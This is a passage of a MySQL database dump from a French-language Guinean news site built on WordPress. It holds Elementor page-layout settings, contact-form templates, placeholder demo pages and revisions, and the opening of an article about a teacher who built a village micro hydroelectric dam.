gzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3126,935,'_elementor_version','0.4'),(3127,935,'_elementor_css','a:3:{s:4:\"time\";i:1511347884;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3128,360,'_elementor_css','a:3:{s:4:\"time\";i:1511782401;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3131,930,'_yoast_wpseo_focuskw_text_input','Open Budget initiative'),(3132,930,'_yoast_wpseo_focuskw','Open Budget initiative'),(3133,930,'_yoast_wpseo_linkdex','58'),(3138,839,'_li_love_count','1'),(3139,938,'_wp_trash_meta_status','publish'),(3140,938,'_wp_trash_meta_time','1512392621'),(3141,939,'_wp_trash_meta_status','publish'),(3142,939,'_wp_trash_meta_time','1512392706'),(3143,940,'_wp_trash_meta_status','publish'),(3144,940,'_wp_trash_meta_time','1512392791');
/*!40000 ALTER TABLE `wpstg0_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_posts`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=941 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_posts`
--

LOCK TABLES `wpstg0_posts` WRITE;
/*!40000 ALTER TABLE `wpstg0_posts` DISABLE KEYS */;
INSERT INTO `wpstg0_posts` VALUES (2,1,'2017-10-23 13:48:44','2017-10-23 13:48:44','','Technologie','','publish','closed','open','','technologie','','','2017-11-01 15:35:41','2017-11-01 15:35:41','',0,'https://guineeinnove.nimbasolution.com/?page_id=2',0,'page','',0),(4,1,'2017-01-20 08:01:15','2017-01-20 08:01:15','<div id=\"contact\"  class=\"transparent\">\n<div class=\"form\">\n<div class=\"border\">\n[text* name id:name placeholder \"Name\"]\n[text* email id:email placeholder \"Email\"]\n[text* subject id:subject placeholder \"Subject\"]\n<br>\n[textarea message 45x8 id:message-form placeholder \"Message Here\"]\n[submit class:submit \"Send\"]\n</div>\n</div>\n</div>\nDemo 7 \"[your-subject]\"\n[your-name] <wordpress@192.168.1.7>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Demo 7 (http://demo7.magzma.com)\nadmin.themesawesome@gmail.com\nReply-To: [your-email]\n\n\n\n\nDemo 7 \"[your-subject]\"\nDemo 7 <wordpress@192.168.1.7>\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Demo 7 (http://demo7.magzma.com)\n[your-email]\nReply-To: admin.themesawesome@gmail.com\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThe date format is incorrect.\nThe date is before the earliest one allowed.\nThe date is after the latest one allowed.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nYour entered code is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2017-01-20 08:01:15','2017-01-20 08:01:15','',0,'http://demo7.magzma.com/?post_type=wpcf7_contact_form&amp;p=4',0,'wpcf7_contact_form','',0),(5,1,'2017-10-23 13:50:37','2017-10-23 13:50:37','<label> Votre nom (obligatoire)\n    [text* your-name] </label>\n\n<label> Votre e-mail (obligatoire)\n    [email* your-email] </label>\n\n<label> Sujet\n    [text your-subject] </label>\n\n<label> Votre message\n    [textarea your-message] </label>\n\n[submit \"Envoyer\"]\nGuinée innove \"[your-subject]\"\n[your-name] <admin@guineeinnove.nimbasolution.com>\nDe : [your-name] <[your-email]>\nSujet : [your-subject]\n\nCorps du message :\n[your-message]\n\n-- \nCet e-mail a été envoyé via le formulaire de contact de Guinée innove (https://guineeinnove.nimbasolution.com)\nadmin@guineeinnove.nimbasolution.com\nReply-To: [your-email]\n\n0\n0\n\nGuinée innove \"[your-subject]\"\nGuinée innove <admin@guineeinnove.nimbasolution.com>\nCorps du message :\n[your-message]\n\n-- \nCet e-mail a été envoyé via le formulaire de contact de Guinée innove (https://guineeinnove.nimbasolution.com)\n[your-email]\nReply-To: admin@guineeinnove.nimbasolution.com\n\n0\n0\nMerci pour votre message. Il a été envoyé.\nUne erreur s’est produite lors de l’envoi de votre message. Veuillez essayer à nouveau plus tard.\nUn ou plusieurs champs contiennent une erreur. Veuillez vérifier et essayer à nouveau.\nUne erreur s’est produite lors de l’envoi de votre message. Veuillez essayer à nouveau plus tard.\nVous devez accepter les termes et conditions avant d\'envoyer votre message.\nCe champ est obligatoire.\nLe champ est trop long.\nLe champ est trop court.','Formulaire de contact 1','','publish','closed','closed','','formulaire-de-contact-1','','','2017-10-23 13:50:37','2017-10-23 13:50:37','',0,'https://guineeinnove.nimbasolution.com/?post_type=wpcf7_contact_form&p=5',0,'wpcf7_contact_form','',0),(357,1,'2017-02-02 04:25:39','2017-02-02 04:25:39','','Magzma Demo 7','','publish','closed','closed','','magzma-demo-7','','','2017-02-02 04:25:39','2017-02-02 04:25:39','',0,'http://demo7.magzma.com/?elementor_library=magzma-demo-7',0,'elementor_library','',0),(359,1,'2017-01-20 07:45:01','2017-01-20 07:45:01','','Société','','publish','closed','open','','societe','','','2017-11-01 16:02:28','2017-11-01 16:02:28','',0,'http://demo7.magzma.com/?page_id=2',0,'page','',0),(360,1,'2017-01-24 07:46:11','2017-01-24 07:46:11','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','publish','closed','closed','','accueil','','','2017-11-27 11:32:39','2017-11-27 11:32:39','',0,'http://demo7.magzma.com/?page_id=5',0,'page','',0),(361,1,'2017-02-02 04:49:34','2017-02-02 04:49:34','<p>At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga. Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit quo minus id quod maxime placeat facere possimus, omnis voluptas assumenda est, omnis dolor repellendus.</p><p>Temporibus autem quibusdam et aut officiis debitis aut rerum necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestiae non recusandae. Itaque earum rerum hic tenetur a sapiente delectus, ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat.</p><p><strong>Telephone :</strong></p><p>+0028 55 67 67</p><p><strong>Email</strong><strong>:</strong></p><p>jennier_aster@yourdomain.com</p><p><strong>Address :</strong></p><p>590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States</p>','Magzma Contact 1','','publish','closed','closed','','magzma-contact-1','','','2017-02-02 04:49:34','2017-02-02 04:49:34','',0,'http://demo7.magzma.com/?elementor_library=magzma-contact-1',0,'elementor_library','',0),(362,1,'2017-02-02 04:49:45','2017-02-02 04:49:45','\n			<ul>\n									<li>\n						<a href=\"#\" title=\"Edit\">\n							Edit\n						</a>\n					</li>\n									<li>\n						<a href=\"#\" title=\"Duplicate\">\n							Duplicate\n						</a>\n					</li>\n									<li>\n						<a href=\"#\" title=\"Remove\">\n							Remove\n						</a>\n					</li>\n							</ul>\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.com/maps?q=London+Eye%2C+London%2C+United+Kingdom&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near\"></iframe>		\n			<ul>\n									<li>\n						<a href=\"#\" title=\"Edit\">\n							Edit\n						</a>\n					</li>\n									<li>\n						<a href=\"#\" title=\"Duplicate\">\n							Duplicate\n						</a>\n					</li>\n									<li>\n						<a href=\"#\" title=\"Remove\">\n							Remove\n						</a>\n					</li>\n							</ul>\n			<p style=\"font-size: 16px; color: #999999;\">In case you some questions popped in your mind, Feel free to call, email or even visit us. Also you can write us about whatever you want down below. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit odio ante, id dapibus elit condimentum vitae. Maecenas eget orci vitae enim accumsan mollis. In congue nunc velit, sit amet eleifend velit cursus vitae.</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Telephone :</strong> +0028 55 67 67</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Email :</strong> jennier_aster@yourdomain.com</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Address :</strong> 590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States</p>		\n		','Magzma Contact 2','','publish','closed','closed','','magzma-contact-2','','','2017-02-02 04:49:45','2017-02-02 04:49:45','',0,'http://demo7.magzma.com/?elementor_library=magzma-contact-2',0,'elementor_library','',0),(363,1,'2017-02-02 05:15:31','2017-01-31 08:54:40','\n			<h3>+224 625 27 22 90</h3>		\n			<h3>+224 664 61 36 77</h3>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.com/maps?q=kaloum&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near\"></iframe>		\n		','Nous Contacter','','publish','closed','closed','','contact-2','','','2017-11-01 16:25:25','2017-11-01 16:25:25','',0,'http://demo7.magzma.com/contact-2/',0,'page','',0),(375,1,'2017-10-23 16:25:54','2017-10-23 16:25:54','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-23 16:25:54','2017-10-23 16:25:54','',360,'https://guineeinnove.nimbasolution.com/2017/10/23/360-revision-v1/',0,'revision','',0),(376,1,'2017-10-25 13:36:58','2017-10-25 13:36:58','&nbsp;\n<h3>Populaires</h3>\n<h3>Videos</h3>\nhttps://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&amp;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o\n<h3>Technologie</h3>\n<h3>Agriculture</h3>\n<h3>Autres</h3>','A','','inherit','closed','closed','','360-autosave-v1','','','2017-10-25 13:36:58','2017-10-25 13:36:58','',360,'https://guineeinnove.nimbasolution.com/2017/10/23/360-autosave-v1/',0,'revision','',0),(377,1,'2017-10-23 16:27:16','2017-10-23 16:27:16','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\r\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\r\n...or something like this:\r\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\r\nAs a new WordPress user, you should go to <a href=\"https://guineeinnove.nimbasolution.com/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','TECHNOLOGIE','','inherit','closed','closed','','2-revision-v1','','','2017-10-23 16:27:16','2017-10-23 16:27:16','',2,'https://guineeinnove.nimbasolution.com/2017/10/23/2-revision-v1/',0,'revision','',0),(378,1,'2017-10-23 16:27:31','2017-10-23 16:27:31','','Agriculture','','publish','closed','closed','','agriculture','','','2017-11-01 15:45:36','2017-11-01 15:45:36','',0,'https://guineeinnove.nimbasolution.com/?page_id=378',0,'page','',0),(379,1,'2017-10-23 16:27:31','2017-10-23 16:27:31','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-23 16:27:31','2017-10-23 16:27:31','',378,'https://guineeinnove.nimbasolution.com/2017/10/23/378-revision-v1/',0,'revision','',0),(380,1,'2017-10-23 16:27:56','2017-10-23 16:27:56','','Economie','','publish','closed','closed','','economie','','','2017-11-01 15:39:24','2017-11-01 15:39:24','',0,'https://guineeinnove.nimbasolution.com/?page_id=380',0,'page','',0),(381,1,'2017-10-23 16:27:56','2017-10-23 16:27:56','','ECONOMIE','','inherit','closed','closed','','380-revision-v1','','','2017-10-23 16:27:56','2017-10-23 16:27:56','',380,'https://guineeinnove.nimbasolution.com/2017/10/23/380-revision-v1/',0,'revision','',0),(382,1,'2017-10-23 16:28:36','2017-10-23 16:28:36','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\r\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\r\n...or something like this:\r\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\r\nAs a new WordPress user, you should go to <a href=\"http://demo7.magzma.com/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','SOCIETE','','inherit','closed','closed','','359-revision-v1','','','2017-10-23 16:28:36','2017-10-23 16:28:36','',359,'https://guineeinnove.nimbasolution.com/2017/10/23/359-revision-v1/',0,'revision','',0),(383,1,'2017-10-23 16:30:06','2017-10-23 16:30:06','','Santé','','publish','closed','closed','','sante','','','2017-11-01 15:47:38','2017-11-01 15:47:38','',0,'https://guineeinnove.nimbasolution.com/?page_id=383',0,'page','',0),(384,1,'2017-10-23 16:30:06','2017-10-23 16:30:06','','SANTE','','inherit','closed','closed','','383-revision-v1','','','2017-10-23 16:30:06','2017-10-23 16:30:06','',383,'https://guineeinnove.nimbasolution.com/2017/10/23/383-revision-v1/',0,'revision','',0),(385,1,'2017-10-23 16:30:27','2017-10-23 16:30:27','','Culture','','publish','closed','closed','','culture','','','2017-11-01 15:57:34','2017-11-01 15:57:34','',0,'https://guineeinnove.nimbasolution.com/?page_id=385',0,'page','',0),(386,1,'2017-10-23 16:30:27','2017-10-23 16:30:27','','CULTURE','','inherit','closed','closed','','385-revision-v1','','','2017-10-23 16:30:27','2017-10-23 16:30:27','',385,'https://guineeinnove.nimbasolution.com/2017/10/23/385-revision-v1/',0,'revision','',0),(388,1,'2017-10-23 16:33:58','2017-10-23 16:33:58',' ','','','publish','closed','closed','','388','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=388',7,'nav_menu_item','',0),(389,1,'2017-10-23 16:33:58','2017-10-23 16:33:58',' ','','','publish','closed','closed','','389','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=389',6,'nav_menu_item','',0),(390,1,'2017-10-23 16:33:57','2017-10-23 16:33:57',' ','','','publish','closed','closed','','390','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=390',3,'nav_menu_item','',0),(391,1,'2017-10-23 16:33:57','2017-10-23 16:33:57',' ','','','publish','closed','closed','','391','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=391',5,'nav_menu_item','',0),(392,1,'2017-10-23 16:33:57','2017-10-23 16:33:57',' ','','','publish','closed','closed','','392','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=392',2,'nav_menu_item','',0),(393,1,'2017-10-23 16:33:57','2017-10-23 16:33:57',' ','','','publish','closed','closed','','393','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=393',1,'nav_menu_item','',0),(399,1,'2017-10-24 13:08:27','2017-10-24 13:08:27','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 13:08:27','2017-10-24 13:08:27','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(402,1,'2017-10-24 13:17:28','2017-10-24 13:17:28','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 13:17:28','2017-10-24 13:17:28','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(403,1,'2017-10-24 13:22:14','2017-10-24 13:22:14','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 13:22:14','2017-10-24 13:22:14','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(404,1,'2017-10-24 13:25:35','2017-10-24 13:25:35','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 13:25:35','2017-10-24 13:25:35','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(405,1,'2017-10-24 13:45:12','2017-10-24 13:45:12','<p class=\"story-body__introduction\">Certains disent de lui qu\'il a \"ramené la lumière dans les ténèbres de Bolodou\", une localité située dans la préfecture de Guéckédou (une subdivision de la région de Nzérékoré) dans le Sud-Est de la Guinée.</p>\r\nExcédé par la situation dans sa localité, Ibrahima Tounkara, enseignant de Mathématiques, a construit un micro-barrage hydroélectrique sur le marigot Gbasso, l\'un des cours d\'eau qui arrosent cette commune rurale.\r\n\r\n<aside class=\"quote\">\r\n<div class=\"quote-inner\">\r\n<blockquote class=\"quote\">Quand j\'ai dit aux villageois que je comptais réaliser un mini-barrage hydroélectrique, personne ne 